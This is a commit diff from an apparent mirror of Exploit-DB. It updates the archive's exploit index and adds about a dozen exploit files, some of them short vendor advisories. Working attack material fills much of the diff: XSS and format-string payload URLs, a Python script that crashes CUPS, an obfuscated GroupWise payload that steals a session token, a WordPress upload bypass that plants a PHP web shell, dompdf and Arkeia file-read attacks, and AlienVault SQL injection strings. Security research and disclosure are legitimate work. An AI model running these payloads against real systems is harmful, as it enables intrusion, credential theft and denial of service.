bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_26_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-26 04:35:04 +00:00
parent 01b033c877
commit 7edc578504
24 changed files with 859 additions and 80 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
files.csv
View file

@ -12565,7 +12565,7 @@ id,file,description,date,author,platform,type,port
14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0
14339,platforms/linux/local/14339.sh,"Ubuntu PAM MOTD Local Root Exploit",2010-07-12,anonymous,linux,local,0
14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@ -12931,7 +12931,7 @@ id,file,description,date,author,platform,type,port
14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0
14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0
14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0
14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
@ -29742,4 +29742,26 @@ id,file,description,date,author,platform,type,port
32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0
32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0
32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Dursun Ince",php,webapps,0
32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0
33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 'data_input.php' Cross Site Scripting Vulnerability",2009-05-15,fgeek,php,webapps,0
33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability",2009-05-20,inking,php,webapps,0
33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0
33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80
33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php, read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80
33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80
33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443
33007,platforms/multiple/remote/33007.txt,"Novell GroupWise <= 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0
33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-05-22,Securitylab.ir,php,webapps,0
33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0
33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0
33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0
33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 'updatecheck.php' Cross Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0
33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0
33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0

Can't render this file because it is too large.

9
platforms/asp/webapps/33009.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35074/info
DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects versions prior to DotNetNuke 4.9.4.
http://www.example.com/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.example.net/XSS.html%22%3

16
platforms/hardware/remote/33010.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35093/info
SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
Global VPN Client 4.0.0.2-51e Standard and Enhanced are vulnerable; other versions may also be affected.
The following proofs of concept are available:
1. CFS: Add example.com to your "Forbidden Domains" and access http://www.example.com/%s%s%s%s%s%s/.
2. GroupVPN: Establish a GroupVPN Tunnel and enter at the XAUTH Username %s%s%s%s%s.
3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s%s%s%s%s

16
platforms/hardware/remote/33016.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35145/info
Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Attackers may exploit this issue to run arbitrary code in the context of the affected application. Failed attempts may cause denial-of-service conditions.
The following are vulnerable:
SSL-VPN 200 firmware prior to 3.0.0.9
SSL-VPN 2000 firmware prior to 3.5.0.5
SSL-VPN 4000 firmware prior to 3.5.0.5
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n

22
platforms/linux/dos/33015.c Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/35143/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an affected process to hang, denying service to legitimate users. Other denial-of-service attacks are also possible.
This issue was introduced in Linux Kernel 2.6.19. The following versions have been fixed:
Linux Kernel 2.6.30-rc3
Linux Kernel 2.6.27.24
Linux Kernel 2.6.29.4
pipe(pfds);
snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);
if (fork()) {
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
} else{
sleep(1);
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
}

91
platforms/linux/dos/33020.py Executable file
View file

@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/35169/info
CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
from struct import pack
import sys
import socket
class IppRequest:
"""
Little class to implement a basic Internet Printing Protocol
"""
def __init__(self, host, port, printers, hpgl_data="a"):
self.printers = printers
self.host = host
self.port = port
self.hpgl_data = hpgl_data
self.get_ipp_request()
def attribute(self, tag, name, value):
data = pack('>B',tag)
data += pack('>H',len(name))
data += name
data += pack('>H',len(value))
data += value
return data
def get_http_request(self):
http_request = "POST /printers/%s HTTP/1.1\r\n" % self.printers
http_request += "Content-Type: application/ipp\r\n"
http_request += "User-Agent: Internet Print Provider\r\n"
http_request += "Host: %s\r\n" % self.host
http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
http_request += "Connection: Keep-Alive\r\n"
http_request += "Cache-Control: no-cache\r\n"
return http_request
def get_ipp_request(self):
operation_attr = self.attribute(0x47, 'attributes-charset', 'utf-8')
operation_attr += self.attribute(0x48, 'attributes-natural-language', 'en-us')
operation_attr += self.attribute(0x45, 'printer-uri', "http://%s:%s/printers/%s" % (self.host, self.port, self.printers))
operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr')
operation_attr += self.attribute(0x42, 'document-format', 'application/vnd.hp-HPGL')
self.ipp_data = "\x01\x00" # version-number: 1.0
self.ipp_data += "\x00\x02" # operation-id: Print-job
self.ipp_data += "\x00\x00\x00\x01" # request-id: 1
self.ipp_data += "\x01" # operation-attributes-tag
self.ipp_data += "\x0f\x0f"
# self.ipp_data += operation_attr
self.ipp_data += "\x02" # job-attributes-tag
self.ipp_data += "\x03" # end-of-attributes-tag
self.ipp_data += self.hpgl_data;
return self.ipp_data
def main():
try:
printer = sys.argv[1]
host = sys.argv[2]
except:
print "[+] Usage: exploit printer_name host"
return 0
data = "A"*100
ipp = IppRequest(host,"80", printer, data)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to the host"
s.connect((host, 631))
#requests = ipp.get_http_request()
#for each in requests:
# s.send(each)
print "[+] Sending request"
s.send(ipp.get_http_request())
s.send("\r\n")
print "[+] Sending ipp data"
s.send(ipp.get_ipp_request())
print "Response:%s" % s.recv(1024)
print "done!"
if __name__ == "__main__":
sys.exit(main())

38
platforms/multiple/remote/33007.txt Executable file
View file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/35066/info
Novell GroupWise WebAccess is prone to multiple security vulnerabilities.
An attacker may leverage these issues to bypass certain security restrictions or conduct cross-site scripting attacks.
Note that some of the issues may be related to BID 35061. We will update this BID as more information emerges.
Versions prior to WebAccess 7.03 HP3 and 8.0.0 HP2 are vulnerable.
Following harmless code uses an onload() event handler to bootstrap its payload as soon as the email
is open.
The first stage of this script extracts the session token (User.Context) from within the current
document&#039;s URI and used
to make up the second stage.
The second injects an iframe in the current page which in turn calls the signature configuration
interface and changes the user&#039;s signature on the fly.
This example uses a fake target, &#039;gwwa.victim.com&#039; that must be changed with a real server
addresss/name.
Here, the security parser won&#039;t recognize "onload = &#039;javascript:..." as potentially unsafe just
because of the space characters.
<!--
<html>
<head>
</head>
<body onmouseover = &#039;return false;&#039; onload = &#039;javascript:var
context=document.location.href;var token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
var
malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
var
malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
document.write(unescape(malwareS1)+token+unescape(malwareS2));return false;&#039;>
<br/>
<br/><br/>Now check your signature ...
</body>
</html>
-->

18
platforms/multiple/remote/33023.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/35196/info
Apache Tomcat is prone to a username-enumeration weakness because it displays different responses to login attempts, depending on whether or not the username exists.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
The following are vulnerable:
Tomcat 4.1.x (prior to 4.1.40)
Tomcat 5.5x (prior to 5.5.28)
Tomcat 6.0.x (prior to 6.0.20)
The following example POST data is available:
POST /j_security_check HTTP/1.1
Host: www.example.com
j_username=tomcat&j_password=%

9
platforms/php/webapps/33000.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34991/info
Cacti is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to Cacti 0.8.7b are vulnerable.
http://www.example.com/cacti/data_input.php?action="><SCRIPT>alert("XSS")</SCRIPT>

10
platforms/php/webapps/33001.ssh Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35038/info
The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.
Remote attackers may exploit this vulnerability to compromise an affected computer.
This issue affects WebShield 1.1.0.62 and prior versions.
http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e

13
platforms/php/webapps/33002.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35053/info
Profense Web Application Firewall is prone to multiple security-bypass vulnerabilities.
An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks.
Versions *prior to* the following are vulnerable:
Profense 2.4.4
Profense 2.2.22
http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

55
platforms/php/webapps/33003.txt Executable file
View file

@ -0,0 +1,55 @@
# Author: nopesled
# Date: 24/04/14
# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
# Company: http://wtf-fu.com/
# Version: 1.2.1
# Tested on: Windows 7
# Vulnerability: Unrestricted File Upload
Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php
By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP.
Append '|php':
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="accept_file_types"\r\n
\r\n
jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n
Now change the extension in the data for 'filename' to '.php' and enter your desired code like so
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="files[]"; filename="illegal.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\n
system($_GET[\'cmd\']);\n
?>\n
- ----------------------------123456789123456--\r\n
Submit this POST request and you will find your file in the directory:
/wp-content/uploads/public/wtf-fu_files/default/
It's not required to set the control 'deny_public_uploads' to true, because it still gets uploaded anyway regardless if it's enabled or not.
###################################
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Signed.
-----BEGIN PGP SIGNATURE-----
Version: Keybase OpenPGP v0.1.11
Comment: https://keybase.io/crypto
wsBcBAABCgAGBQJTWQpLAAoJEOB0UMODnV4U7QIIAIKXDQVK8fIXY0BSO4ZrHq8L
2a51JCVmpwBzrHVp87FCpYHcMXyuCXWi5joEbiJFVi5ojHTSii5ZwvBVJwvyoKcy
jexj2IvMoC30zrgSdTu9/lMd1tYGYQCSlMubFvzE0edmDCo7fH2gF8Zvfw4Lj4ng
KJOpB9HsvDUJVNlbDMl+MbGAW32m6BqG4ttdjE1bs1suDxb/JrS7okuHu1Qmpe0+
Xp50x4wUVrZSeqT5VnWDWjox2BnSGEcAKbkjFeRDBpgJyeWJGH20jXb6m4sYNLDT
gf9ml9oM5yncivMN2dJU+hp3Xyfp6rEute9jA+lcEMwZsyjlwAVFhszV4qh7X+o=
=5nDI
-----END PGP SIGNATURE-----
###################################

47
platforms/php/webapps/33004.txt Executable file
View file

@ -0,0 +1,47 @@
Vulnerability title: Arbitrary file read in dompdf
CVE: CVE-2014-2383
Vendor: dompdf
Product: dompdf
Affected version: v0.6.0
Fixed version: v0.6.1 (partial fix)
Reported by: Alejo Murillo Moyas
Details:
An arbitrary file read vulnerability is present on dompdf.php file that
allows remote or local attackers to read local files using a special
crafted argument. This vulnerability requires the configuration flag
DOMPDF_ENABLE_PHP to be enabled (which is disabled by default).
Using PHP protocol and wrappers it is possible to bypass the dompdf's
"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing
system files or other files on the webserver. Please note that the flag
DOMPDF_ENABLE_REMOTE needs to be enabled.
Command line interface:
php dompdf.php
php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
Web interface:
http://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

171
platforms/php/webapps/33005.txt Executable file
View file

@ -0,0 +1,171 @@
SEC Consult Vulnerability Lab Security Advisory < 20140423-0 >
=======================================================================
title: Path Traversal/Remote Code Execution
product: WD Arkeia Virtual Appliance (AVA)
vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3.
fixed version: 10.2.9
CVE number: CVE-2014-2846
impact: critical
homepage: http://www.arkeia.com/
found: 2014-03-05
by: M. Lucinskij
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and
affordable data protection for enterprises seeking to optimize the benefits of
virtualization. The AVA offers all the features of the hardware appliance, but
permits you to use your own choice of hardware."
source:
http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance
Business recommendation:
------------------------
The identified path traversal vulnerability can be exploited by unauthenticated
remote attackers to gain unauthorized access to the WD Arkeia virtual appliance
and stored backup data.
SEC Consult recommends to restrict access to the web interface of the WD Arkeia
virtual appliance using a firewall until a comprehensive security
audit based on a security source code review has been performed and all
identified security deficiencies have been resolved by the affected vendor.
Vulnerability overview/description:
-----------------------------------
The WD Arkeia virtual appliance is affected by a path traversal vulnerability.
Path traversal enables attackers access to files and directories outside the
web root through relative file paths in the user input.
An unauthenticated remote attacker can exploit the identified vulnerability in
order to retrieve arbitrary files from the affected system and execute system
commands.
Proof of concept:
-----------------
The path traversal vulnerability exists in the
/opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie
is not properly checked before including a file using the PHP include()
function. Example of the request that demonstrates the vulnerability by
retrieving the contents of the /etc/passwd file:
POST /login/doLogin HTTP/1.0
Host: $host
Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
password=bbb&username=aaa
The response from the affected application:
HTTP/1.1 200 OK
Date: Wed, 05 Mar 2014 08:29:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Charset: UTF-8
Content-Length: 1217
Connection: close
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
{"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or
login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n
ull]}}
Furthermore, the identified vulnerability can be also exploited to
execute arbitrary PHP code/system commands by including files that
contain specially crafted user input.
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the 10.2.7 version of the WD
Arkeia virtual appliance.
According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since
7.0.3 are affected.
Vendor contact timeline:
------------------------
2014-03-13: Contacting vendor through support@arkeia.com
2014-03-14: Vendor confirms the vulnerability.
2014-03-17: Vendor provides a quick fix and a release schedule.
2014-04-21: Vendor releases a fixed version
2014-04-23: SEC Consult releases a coordinated security advisory.
Solution:
---------
Update to the most recent version (10.2.9) of Arkeia Network Backup.
More information can be found at:
http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
Workaround:
-----------
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF M. Lucinskij / @2014

73
platforms/php/webapps/33006.txt Executable file
View file

@ -0,0 +1,73 @@
AlienVault 4.3.1 Unauthenticated SQL Injection
Vulnerability Type: SQL Injection
Reporter: Sasha Zivojinovic
Company: Gotham Digital Science
Affected Software: AlienVault 4.3.1
Severity: Critical
===========================================================
Summary
===========================================================
A number of SQL injection vectors were identified within AlienVault (AV) 4.3.1 components. The “Geolocation Graph” and “Radar Access Control” AV components were found to accept HTTP request parameters that are concatenated without filtering or validation. These parameters are then passed as SQL queries which exposes the application to SQL Injection. This issue can be exploited by any unauthenticated users who have access to the AV web application. In addition the effective MySQL user was found to be “root” which allows attackers to leverage the identified issues into attacks against the AV host system.
===========================================================
Technical Details
===========================================================
The date_from and date_to parameters passed to the graph_geoloc.php page, the date_from and date_to parameters passed to the radar-iso27001-A11AccessControl-pot.php page and the “user” parameter passed to the “graph_geoloc2.php” page are vulnerable to SQL injection attacks. These parameters were found to evaluate any SQL statements passed to them via a HTTP GET request.
PHP functions “whereYM” and “getSourceLocalSSIYear” in source file “/var/www/geoloc/include/data_functions.inc” do not filter or validate user supplied input when constructing dynamic SQL queries. Attackers can inject arbitrary SQL statements that will be evaluated on the underlying MySQL server.
Due to time limitations it has not been possible to locate the causes of the other identified vectors.
Extending the attack:
An attacker can retrieve various AV credentials including the MySQL connection string by querying the “alienvault.config” database table or by querying the “/etc/ossim/idm/config.xml” file through MySQL file access methods such as “LOAD_FILE”. Almost all credentials used by AV are equivalent so retrieving the credentials for the nessus user will also reveal the credentials for the SQL server and other components. These credentials are stored in plain-text within the database. By querying the “alienvault.users” table the attacker can retrieve the unsalted MD5 password hashes for administrative users. These hashed credentials are equivalent to the SSH credentials for the same users. Once these credentials have been retrieved and cracked an attacker can bypass the restrictions present in the SQL injection vector and perform arbitrary system or SQL queries by connecting directly to the AV host via SSH and using the local MySQL client to connect to the MySQL server.
Cross Site Scripting (XSS):
In addition the presence of MySQL errors presents an opportunity for reflected XSS attacks as the MySQL server does not filter responses when returning errors to the application user.
===========================================================
Proof-of-Concept Exploit
===========================================================
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20all%20select(SLEEP(10)),2—%20-&date_to=2013-07-30
The integer value passed as a parameter to the “SLEEP” function can be increased or decreased to validate this finding.
Error based evaluation can be used to return the MySQL version as per the following examples:
https://127.0.0.1/geoloc/graph_geoloc2.php?year=2007&user=dsdds%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a);—%20-
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2013-07-30
